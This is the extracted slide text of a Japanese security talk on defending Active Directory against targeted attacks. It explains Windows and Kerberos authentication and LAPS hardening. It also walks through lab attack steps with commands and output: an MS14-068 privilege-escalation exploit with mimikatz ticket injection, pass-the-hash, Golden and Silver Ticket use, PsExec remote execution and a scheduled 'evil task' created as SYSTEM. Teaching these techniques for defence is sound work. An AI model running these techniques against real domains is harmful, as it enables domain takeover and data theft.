![MS14-068は特権のないアカウントが管理者
アカウントに権限昇格が可能です。
#python ms14-068.py -u user01@apt.local ****** ******
Password:
[+] Building AS-REQ for 192.168.175.154... Done!
~ ~ ~ ~ ~省略~ ~ ~ ~ ~
[+] Parsing TGS-REP from 192.168.175.154... Done!
[+] Creating ccache file 'TGT_user01@apt.local.ccache'... Done!
mimikatz # kerberos::ptc TGT_user01@apt.local.ccache
Start/End/MaxRenew: 2017/07/19 5:02:32 ; 2017/07/19 15:02:32 ; 2017/07/26 5:02:32
Service Name (01) : krbtgt ; APT.LOCAL ; @ APT.LOCAL
Target Name (01) : krbtgt ; APT.LOCAL ; @ APT.LOCAL
Client Name (01) : user01 ; @ APT.LOCAL
Flags 50a00000 : pre_authent ; renewable ; proxiable ; forwardable ;
Session Key : 0x00000017 - rc4_hmac_nt
2ef1173411225b67631ce66964f7c478
Ticket : 0x00000000 - null ; kvno = 2 [...]
* Injecting ticket : OK
>dir APTDC.APT.LOCALc$
ドライブ APTDC.APT.LOCALc$ のボリューム ラベルがありません。
ボリューム シリアル番号は DE13-FB18 です
APTDC.APT.LOCALc$ のディレクトリ
2009/07/14 12:20 <DIR> PerfLogs
2017/07/15 23:08 <DIR> Program Files
2017/07/15 23:08 <DIR> Program Files (x86)
2017/07/15 23:06 <DIR> Users
2017/07/15 23:49 <DIR> Windows
0 個のファイル 0 バイト
5 個のディレクトリ 32,835,375,104 バイトの空き領域
MS14-068の場合
権限昇格済みのCredential
Cacheを生成
生成したCredential
Cacheを取り込む
Administratorとしてアクセス](https://image.slidesharecdn.com/apt-170827050122/85/-60-320.jpg)
![設定されるパスワードは、[表示]-[詳細設定]でコン
ピュータアカウントの[Attributes Editor]の[ms-Mc
s-AdmPwd]にパスワードが記載されています。
LAPS](https://image.slidesharecdn.com/apt-170827050122/85/-88-320.jpg)
![[ms-Mcs-AdmPwdExpirationTime ]にパスワー
ドの期限がセットされている。以下のコマンドで期限を
確認できます。
LAPS
w32tm /ntte 131437074331114635
152126 05:50:33.1114635 - 2017/07/05 14:5
0:33](https://image.slidesharecdn.com/apt-170827050122/85/-89-320.jpg)
![Session KeyがnullでもGolden Ticketとして利用
することができることから、ADではSession Keyの正
当性について確認されていないと推測しています。
2.Golden Ticket
Kerberos TGT of current session :
Start/End/MaxRenew: 2017/08/08 20:26:40 ; 2027/08/06 20:26:40 ; 2027/
08/06 20:26:40
Service Name (02) : krbtgt ; PENTEST.LOCAL ; @ PENTEST.LOCAL
Target Name (--) : @ PENTEST.LOCAL
Client Name (01) : nonenuser ; @ PENTEST.LOCAL
Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
0000000000000000000000000000000000000000000000000000000000000000
Ticket : 0x00000012 - aes256_hmac ; kvno = 0
[...]
** Session key is NULL! It means allowtgtsessionkey is not set to 1 **](https://image.slidesharecdn.com/apt-170827050122/85/-105-320.jpg)
標的型攻撃からどのように身を守るのか
- 2. 自己紹介 小河 哲之 Twitter:abend@number3to4 所属:三井物産セキュアディレクション セキュリティエンジニア • ISOG-WG1 • Burp Suite Japan User Group • Prosit • July Tech Festa2015登壇 • Software Design寄稿
- 4. 結論
- 5. どうすればいいのか
- 7. 標的型攻撃は、明確な意思と目的を持った人間 (攻撃者)が特定の組織に対して特定の目的(情 報の窃取や削除)のために行うサイバー攻撃の一種 をいうようになっている。 by wikipedia 標的型攻撃
- 8. 標的型攻撃にはいくつかのステップがあります。 準備 潜入 横断的 侵害 活動 ターゲットの組織を定め情報収集し(準備)、ターゲット の組織に侵入(潜入)。重要なサーバへ侵入し(横断 的侵害)、機密情報の窃取・隠ぺいを行う(活動)。 JPCERT/CC ログを活用したActive Directoryに対する攻撃の検知と対策より 標的型攻撃のステップ
- 20. アカウント名、パスワードまたは証明書など で認証を行い、ログオンする。認証の中核を 担うのがLSA(Local Security Authority)。 Windowsの認証 アクションによる認証 PINによる認証
- 21. Login UI etc... LSA LSA Server Service Netlogon SAM DC etc... Windowsの認証
- 22. Windowsでは、パスワードを平文のまま保存 することはなく、Hash化された状態で管理さ れます。LM Hash、NTLM Hashが存在してお り、それぞれsaltはありません。 Administrator:500:aad3b435b51404eeaad3b435b51404ee: 0d4004f922985039f449d220c0ae5ac6::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cf e0d16ae931b73c59d7e0c089c0::: 赤字:LM Hash 黒字:NTLM Hash Windowsの認証
- 23. 脆弱なhash関数で、簡単にパスワードを特定 することが可能。Vista以降は利用しないよう になっています。 ・14byteに制限 ・大文字小文字区別なし ・7byteごとに暗号化 LM Hash
- 24. パスワードをUnicodeとしてMD4でhashした 128bitの値。LM Hashと比較するとセキュリ ティの強度は高くなっています。 NTLM Hash import hashlib,binascii hash = hashlib.new('md4', "P@ssword".encode('utf- 16le')).digest() print binascii.hexlify(hash)
- 28. MITで開発されたネットワーク認証方式。 Au thentication Server(AS)、Ticket Granting Service(TGS) などの機能から構成されるKey Distribution Center(KDC)が発行するTicket Granting Ticket(TGT)を用いて、認証・認可 を行っています。 Kerberos認証 DC AS TGS KDC
- 33. ERR-PREAUTH-REQUIREDとなってしまう が、その際にKDCはtimestampを返します。 クライアント KDC ⓪’ERR-PREAUTH-REQUIRED ⓪’ ERR-PREAUTH-REQUIRED timestamp
- 41. TGSはTGTからSession Key①を取り出し、 アクセス元のIPアドレスや有効期限などの確 認を行います。 クライアント名 IPアドレス timestamp Session Key①で暗号 TGS-REQ Session Key① etc... TGSのパスワードhashで暗号 TGT ③TGS-REQ
- 43. TGSはSession Key②を生成し、クライアン トのIPアドレスなどをサービスごとのマス ターキーで暗号化します。 クライアント名 IPアドレス timestamp TGS-REPSession Key② Service Master Keyで暗号 Service Ticket Session Key①で暗号 ④TGS-REP
- 46. 以下の攻撃シナリオを想定。 1. ターゲットとする組織内の社員に不正プログラムを実行 させる 2. C&Cサーバから指令を受けられるようにする 3. 情報収集し、管理者権限へ昇格する 4. ターゲットとなる機密情報へアクセスする 5. 永続的な攻撃のための準備を行う 6. 機密情報を外部へ送信する 7. アクセスしたログを隠ぺいする 攻撃の想定シナリオ
- 47. 3. 情報収集し、管理者権限へ昇格する • 侵入したアカウント(不正プログラムを実行したアカウン ト)がどういう権限を有しているのか。 • 管理者権限がないのであれば、残存する認証情報の取得に よる権限昇格、脆弱性による権限昇格を行う。 4. ターゲットとなる機密情報へアクセスする • 機密情報がどこに保存されているのか。ファイルサーバや データベース上にある情報へアクセスする。 5. 永続的な攻撃のための準備を行う • パスワード変更による侵入不可とならないように永続的な 攻撃が行えるようにする。 攻撃の想定シナリオ
- 49. 攻撃者は、効率よく攻撃を行うために情報収集を行い ますが、収集する情報の中にアカウント一覧やその権 限もあります。 情報収集 UserA DomainUsers UserB DomainAdmins UserC DomainUsers ターゲット
- 50. ADでユーザ一覧を収集し、攻撃の対象を特定するこ とで攻撃にかかる時間が短縮されます。また、ドメインア カウントだけではなくローカルアカウントについても同様に 調査します。 情報収集 C:¥> net user /domain --------------------------------------- Administrator Guest krbtgt use03 user01 user02 useradmin
- 51. アカウントの詳細情報やグループの情報を収集します。 情報収集 C:¥> net user /domain useradmin ユーザー名 useradmin フル ネーム useradmin ーーー 省略 ーーー 所属しているグローバル グループ *Domain Admins *Domain Users
- 53. 侵入した環境(不正プログラムを実行したアカ ウント)がローカル管理者権限を有するかどう かで、その後の手順が大きく変わってきます。 ローカル管理者権限の有無 • システムファイルへのアクセス • メモリ上の認証情報へのアクセス • レジストリへのアクセス • 各種設定変更 ローカル管理者権限がない
- 54. 攻撃手法が限定されてしまうため、ローカル 管理者権限を取得する必要があります。権限 昇格するには以下の方法があります。 • クレデンシャル情報の残存 • 脆弱性を悪用した権限昇格 • クレデンシャル情報管理の不備 ローカル管理者権限がない場合
- 60. MS14-068は特権のないアカウントが管理者 アカウントに権限昇格が可能です。 #python ms14-068.py -u [email protected] ****** ****** Password: [+] Building AS-REQ for 192.168.175.154... Done! ~ ~ ~ ~ ~省略~ ~ ~ ~ ~ [+] Parsing TGS-REP from 192.168.175.154... Done! [+] Creating ccache file '[email protected]'... Done! mimikatz # kerberos::ptc [email protected] Start/End/MaxRenew: 2017/07/19 5:02:32 ; 2017/07/19 15:02:32 ; 2017/07/26 5:02:32 Service Name (01) : krbtgt ; APT.LOCAL ; @ APT.LOCAL Target Name (01) : krbtgt ; APT.LOCAL ; @ APT.LOCAL Client Name (01) : user01 ; @ APT.LOCAL Flags 50a00000 : pre_authent ; renewable ; proxiable ; forwardable ; Session Key : 0x00000017 - rc4_hmac_nt 2ef1173411225b67631ce66964f7c478 Ticket : 0x00000000 - null ; kvno = 2 [...] * Injecting ticket : OK >dir APTDC.APT.LOCALc$ ドライブ APTDC.APT.LOCALc$ のボリューム ラベルがありません。 ボリューム シリアル番号は DE13-FB18 です APTDC.APT.LOCALc$ のディレクトリ 2009/07/14 12:20 <DIR> PerfLogs 2017/07/15 23:08 <DIR> Program Files 2017/07/15 23:08 <DIR> Program Files (x86) 2017/07/15 23:06 <DIR> Users 2017/07/15 23:49 <DIR> Windows 0 個のファイル 0 バイト 5 個のディレクトリ 32,835,375,104 バイトの空き領域 MS14-068の場合 権限昇格済みのCredential Cacheを生成 生成したCredential Cacheを取り込む Administratorとしてアクセス
- 64. クレデンシャル情報は、いろんな箇所に残っていることが 多い。特に、ファイルサーバやNASはお宝の山と言って いいほど、重要情報が適切にアクセス制限かけられて いないことが多い。 クレデンシャル情報管理の不備 ユーザ名、パスワードの一覧 パスワードが記載されたプログラ ムファイル コンフィグファイル IPアドレス一覧 ネットワーク構成図 メールのバックアップ 部門単位でフォルダ管理 されているが、Domain Userが読込み可となっ ていることがある
- 66. startup用プログラムのバックアップをそのまま残存させ ているケースがありました。 クレデンシャル情報管理の不備 net use i fileservershare P@ssw0rd /user:mente Textファイル、batファイル、ps1ファイル、shファイルなど にパスワードがそのまま記載されているケースがあります。
- 70. パスワードのhashを用いて、侵入しコマンド を実行する手法。 NTLM Hash、LM Hash は saltを使用していないため、パスワードが同じ だと同じhashになります。 Pass the Hash(PtH) 文字列:P@ssw0rd LM Hash:921988BA001DC8E14A3B108F3FA6CB6D NTLM Hash:E19CCF75EE54E06B06A5907AF13CEF42
- 71. どんなに複雑なパスワードを利用していても、 hash値にしてしまうと意味はなくパスワード の使い回しによる影響を受けます。 PtH Host1 admin : ????? Host2 admin : ????? パスワードが 分からなくて も認証突破で きてしまう。 hash値 hash値
- 72. PtHを行えるアカウントの権限によっては、完 全に支配することが可能となります。 Host admin : ?????hash値 コマンド コマンドが実行 される。 PtH
- 74. PtHによるコマンド実行もUACによりブロックすることが 可能です。 UAC Host admin : ????? hash値 コマンド UAC UACがコマンド実行を防ぐ 以下、抜粋 HASH PASS: Substituting user supplied NTLM HASH... ERROR: CreateService failed. NT_STATUS_ACCESS_DENIED. E_md4hash wrapper called. HASH PASS: Substituting user supplied NTLM HASH...
- 75. ただし、UACはデフォルトの設定ではビルトインの Administratorは対象の範囲外であるため、該当ア カウントが有効になっている場合、PtHされる可能性が あります。Administratorを別名に変更していても UACは適用されない。 UAC Host Administartor : ????? hash値 コマンド UAC Administratorの場合、UACは 適用されない
- 82. 管理される側は「AdmPwd GPO Extension」だけ で大丈夫。サイレントインストールも可能。 LAPS msiexec /i serversharelaps.x64.msi /queit
- 83. 管理する側(DC)では、以下を行う必要があります。 • スキーマの拡張 • ADでOUを作成し、対象とするコンピュータアカウン トを所属させる • 権限設定 • グループポリシーでLAPSの設定を行う LAPS
- 84. 管理する側(DC)では、以下のスキーマ拡張処理を行 う必要があります。 LAPS Import-Module AdmPwd.PS Update-AdmPwdADSchema
- 85. DCで、適当なOUを作成し管理したいコンピュータアカ ウントを所属させ、権限の設定を行います。 LAPS Set-AdmPwdComputerSelfPermission –Orgunit OU名 Set-AdmPwdReadPasswordPermission –Orgunit OU 名 –AllowedPrincipals 許可するグループ Set-AdmPwdResetPasswordPermission –Orgunit OU 名 –AllowedPrincipals 許可するグループ
- 87. GPOのLAPSには以下の項目があります。 • PasswordSettings →設定するパスワードの複雑さや長さ、有効期間を設定 • Name of administrator account to manage →独自に管理者アカウントを作成している場合にアカウント名を指定する。 Administratorの場合、未設定。 • Do not allow password expiration time・・・ →グループポリシなどでパスワード期限が設定されていても変更する。 • Enable local admin password management →有効に設定する LAPS
- 89. [ms-Mcs-AdmPwdExpirationTime ]にパスワー ドの期限がセットされている。以下のコマンドで期限を 確認できます。 LAPS w32tm /ntte 131437074331114635 152126 05:50:33.1114635 - 2017/07/05 14:5 0:33
- 90. ADで認可に用いられるTicketを何らかの方法で、偽 造したり、正当なユーザから搾取することで、認証を行 われずに当該ユーザになりすましたり、権限昇格が行う ことができてしまう。その手法を一般的にPass the Ticketと呼ばれています。 Pass the Ticket(PtT) TGT 偽造 Service Ticket
- 91. PtTには3つのタイプが存在します。 1. 既存のTicketを用いたPtT 2. Golden Ticketを用いたPtT 3. Silver Ticketを用いたPtT 影響はそれぞれ異なります。 PtTのタイプ
- 92. それぞれ利用するTicketが異なります。 PtTのタイプ TGT Service Ticket クライアント TGT Service Ticket 攻撃者 1.既存のTicketを用いたPtT 搾取し、利用 2.Golden Ticketを用いたPtT 3. Silver Ticketを用いたPtT 偽造 偽造
- 93. 1. 既存のTicketを用いたPtT → 取得するアカウントの権限に依存します。 2. Golden Ticketを用いたPtT → 管理者になりすますことが可能。 3. Silver Ticketを用いたPtT → 特定のサービスでなりすますことが可能。 PtTの影響
- 94. クライアントPCのメモリ上にTicketがキャッシュされます。 1.既存のTicketを用いたPtT C:Usersuser01>klist 現在のログオン ID: 0:0x226f1 キャッシュされたチケット: (2) #0> クライアント: user01 @ PENTEST.LOCAL サーバー: krbtgt/PENTEST.LOCAL @ PENTEST.LOCAL Kerberos チケットの暗号化の種類: AES-256-CTS-HMAC-SHA1-96 チケットのフラグ 0x40c10000 -> forwardable renewable initial name_canonicalize 開始時刻: 7/22/2017 9:42:36 (ローカル) 終了時刻: 7/22/2017 19:42:36 (ローカル) 更新期限: 7/29/2017 9:42:36 (ローカル) セッション キーの種類: AES-256-CTS-HMAC-SHA1-96 ~~ 以下略 ~~
- 96. AdministratorのTicketのみ読み込ませる。 1.既存のTicketを用いたPtT C:>klist 現在のログオン ID: 0:0xe0853 キャッシュされたチケット: (4) #0> クライアント: Administrator @ PENTEST.LOCAL サーバー: krbtgt/PENTEST.LOCAL @ PENTEST.LOCAL Kerberos チケットの暗号化の種類: AES-256-CTS-HMAC-SHA1-96 チケットのフラグ 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize 開始時刻: 7/22/2017 9:59:34 (ローカル) 終了時刻: 7/22/2017 19:59:34 (ローカル) 更新期限: 7/29/2017 9:59:34 (ローカル) セッション キーの種類: AES-256-CTS-HMAC-SHA1-96 ~~ 以下略 ~~
- 97. Administratorとしてアクセスできるようになります。 1.既存のTicketを用いたPtT C:>dir pen-dcc$ ドライブ pen-dcc$ のボリューム ラベルがありません。 ボリューム シリアル番号は 2C16-D0EF です pen-dcc$ のディレクトリ 2013/08/23 00:52 <DIR> PerfLogs 2017/07/16 16:25 <DIR> Program Files 2017/07/10 20:55 <DIR> Program Files (x86) 2017/06/07 08:25 <DIR> Users 2017/07/18 10:50 <DIR> Windows 0 個のファイル 0 バイト 5 個のディレクトリ 50,545,819,648 バイトの空き領域
- 98. 想定される攻撃シナリオは以下です。 1. 攻撃者がPtHで管理者の利用している端末に対し て、TicketをExportさせる。 2. 攻撃者がExportしたTicketを読み込ませる。 3. 管理者としてアクセスする。 1.既存のTicketを用いたPtT
- 101. Golden Ticketを偽造する際にアカウント名などを指 定します。存在しないアカウント名でも悪用可能な Golden Ticketを偽造することが可能。 2.Golden Ticket 存在しないアカウント名のGolden Ticketを用いてアクセスした際のサー バ側での出力 C:¥Users¥Administrator>net session コンピューター ユーザー名 クライアント オープン アイドル時間 ------------------------------------------------------------------------------- ¥¥192.168.175.179 test 0 00:00:08 コマンドは正常に終了しました。
- 103. Golden Ticketを用いたアクセスと通常のアクセスでは 違いがないため、見分けがつかない。 2.Golden Ticket 通常のアクセス Golden Ticketを用いた アクセス
- 104. Golden Ticketを不正に作成するためには、TGSの パスワードhashなどの情報が必要となります。この hashは、krbtgtアカウントのパスワードhashを指して います。 2.Golden Ticket Session Key① TGSのパスワードhashで暗号 TGTクライアント名 IPアドレス Timestamp
- 105. Session KeyがnullでもGolden Ticketとして利用 することができることから、ADではSession Keyの正 当性について確認されていないと推測しています。 2.Golden Ticket Kerberos TGT of current session : Start/End/MaxRenew: 2017/08/08 20:26:40 ; 2027/08/06 20:26:40 ; 2027/ 08/06 20:26:40 Service Name (02) : krbtgt ; PENTEST.LOCAL ; @ PENTEST.LOCAL Target Name (--) : @ PENTEST.LOCAL Client Name (01) : nonenuser ; @ PENTEST.LOCAL Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 0000000000000000000000000000000000000000000000000000000000000000 Ticket : 0x00000012 - aes256_hmac ; kvno = 0 [...] ** Session key is NULL! It means allowtgtsessionkey is not set to 1 **
- 107. 攻撃者が社内ネットワークに侵入された可能性がある 場合、Golden Ticketを作成されている可能性を考 慮する。 2.Golden Ticket Golden Ticketが使われたかどうかを検知することが 非常に難しいため、使われたことを前提に対処すること が好ましいと考えます。
- 110. Golden Ticketは特定のアカウントになりすまして、当 該アカウントが許可されているサービスを利用可能であ ることに対して、Silver Ticketは特定のサービスのみ 利用可能です。 3.Silver Ticket Golden Ticket Silver Ticket 特定のアカウントが 許可されたサービス を利用可能 特定のサービスに対 して特定のアカウント として利用可能 なりすましてアクセス なりすましてアクセス
- 112. 下記のSilver Ticketは対象サーバ(WIN2008R2. pentest.local)のCIFS(445/tcp)でAdministrat orとしてアクセスできるもの。 3.Silver Ticket #0> クライアント: Administrator @ PENTEST.LOCAL サーバー: cifs/WIN2008R2.pentest.local @ PENTEST.LOCAL Kerberos チケットの暗号化の種類: RSADSI RC4-HMAC(NT) チケットのフラグ 0x40a00000 -> forwardable renewable pre_authent 開始時刻: 8/18/2017 13:04:10 (ローカル) 終了時刻: 8/16/2027 13:04:10 (ローカル) 更新期限: 8/16/2027 13:04:10 (ローカル) セッション キーの種類: RSADSI RC4-HMAC(NT)
- 113. CIFS(445/tcp)に対するSilver Ticketを利用し、 psexec.exeを用いて任意のコマンド実行も可能とな ります。 3.Silver Ticket C:>PsExec.exe win2008r2 hostname PsExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - www.sysinternals.com WIN2008R2 hostname exited on win2008r2 with error code 0.
- 114. 任意のスケジュールタスクを作成・登録することができて しまいます。 3.Silver Ticket C:>schtasks /create /S win2008r2.pentest .local /SC DAILY /RU "NT AuthoritySystem" /TN "Daily Evil Task" /TR "c:windows system32cmd.exe" #0> クライアント: Administrator @ PENTEST.LOCAL サーバー: HOST/WIN2008R2.pentest.local @ PENTEST.LOCAL Kerberos チケットの暗号化の種類: RSADSI RC4- HMAC(NT) 以下、省略
- 122. ATAですべての攻撃を検知できるわけではなく、Black Hat USA2017で発表のあった通り、Golden Ticke tの生成時のオプションによっては検知できない。また、S ilver Ticketについても検知ができない。 完璧に検知できるわけではない http://www.mbsd.jp/blog/ 20170802.html
- 125. 自分で作る
- 131. 完璧に守るのは非常に難しい。日頃の運用を適切に 行い、問題に早く気付けることが被害拡大を抑えること になると考えています。 • 認証情報の管理 → 一括管理し、管理している箇所のセキュリティレベルを高める。 • アカウント管理 → 管理者権限を有するアカウントは最小限にする。 • セキュリティ対策の管理 → 定期的にセキュリティパッチを適用する。また、定期的に作業ができる ような環境づくり(冗長化やテスト環境の整備など)も重要と考えます。 まとめ
- 133. • http://www.eventhelix.com/RealtimeMantra/Networking/kerberos/kerberos-sequence- diagram.pdf • https://msdn.microsoft.com/ja-jp/library/dn751047(v=ws.11).aspx • https://stackoverflow.com/questions/15603628/how-to-calculate-ntlm-hash-in-python • https://www.blackhat.com/docs/us-15/materials/us-15-Metcalf-Red-Vs-Blue-Modern- Active-Directory-Attacks-Detection-And-Protection-wp.pdf • https://www.microsoft.com/en-us/download/details.aspx?id=46899 • https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre- authentication-why-it-should-not-be-disabled.aspx • https://technet.microsoft.com/en-us/mt227395.aspx • https://gallery.technet.microsoft.com/Reset-the-krbtgt-account-581a9e51 • https://blogs.technet.microsoft.com/janelewis/2006/12/19/the-krbtgt-account-what-is- it/ • https://adsecurity.org/?p=2011 参考URL